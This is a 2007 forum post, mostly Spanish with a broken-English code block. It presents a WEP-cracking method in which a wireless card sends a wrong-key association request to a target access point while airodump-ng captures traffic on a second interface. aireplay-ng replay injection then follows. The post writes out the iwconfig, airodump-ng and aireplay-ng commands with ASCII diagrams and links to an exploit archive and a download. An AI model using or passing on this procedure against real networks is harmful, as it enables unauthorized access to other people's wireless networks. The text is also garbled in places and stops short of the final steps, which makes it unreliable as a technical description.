Fake Wep

Started by Komtec1, November 21, 2007, 09:50:15 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

Komtec1

November 21, 2007, 09:50:15 PM Last Edit: November 21, 2007, 09:55:53 PM by Komtec1
Bueno aqui otro metodo mas para crackear redes inalambricas, es el metodo que use con wifislax, aqui lo hago con backtrack y dos tarjetas de red inalambricas, :-D y listo para descargar :P aqui se ve un poco mejor y mas explicado...

tambine aqui el link de miwlr0m

http://milw0rm.com/author/1068

http://www.mediafire.com/?cdj5gwtl8bw

aqui dejo la explicacion, este metodo lo encontre yo, si no no estaria en milw0rm :-)

Code Select

Faking Wep With Wifislax

How To

Well the fundaments of this method are this:

When you make a request to an AP this give back a response from his part to tell if the autentication
was sucefull or was denied, then at this point it's necesary got a transmicion valid with the AP
in this is where is based this paper, let's gonna se it...



          First in  Wifislax it's implemente the interfaz rtap0 for that reason you can use rtap0 to make
          a replay of packets and you cardas eth0 it's still free, that's the first point         

          _____________
          |            |
          | WirelessCard |  ________eth0
          |____________|        |
                                |
                                |_____rtap0

       
          Well in this point first we gonna start to capture with airodump with the rtap0 interfaz, after
          that we gonna send a request to the acces point with any wep key but now with the eth0
          interfaz

          _____________
          |            |
          | WirelessCard |  ________eth0-------------------- iwconfig eth0 essid targetname key anywepkey                   
          |____________|        |
                                |
                                |_____rtap0----------------- airodump-ng -w anyname rtap0
                                                                                 

          Ok we can se here in the next diagram what thew response was denied, but in that transmision
          was generated the valid key to tell eth0 what the key wasn't valid, that's  the point what
          we wanted
       
          _____________
          |            |
          | WirelessCard |  ________eth0-------------------- eth0 ----request------ AP ----responsedenied------eth0
          |____________|        |
                                |
                                |_____rtap0----------------- airodump-ng -w anyname rtap0
                                                                                 

        At this point we have one valid request between the AP and the wireless card and we can start the
        inyection of paquets
       
          _____________
          |            |
          | WirelessCard |  ________eth0-------------------- eth0 denied with a valid key
          |____________|        |
                                |
                                |_____rtap0----------------- airodump-ng -w anyname rtap0
                                                             aireplay-ng -3 -b mac -h mac rtap0 eth0

         Well after this step you know what is the next part....


Komtec1


Komtec1


Metasploit Doesn't Pwn Systems, Black Hats Pwn
Print
Go Up Pages1
User actions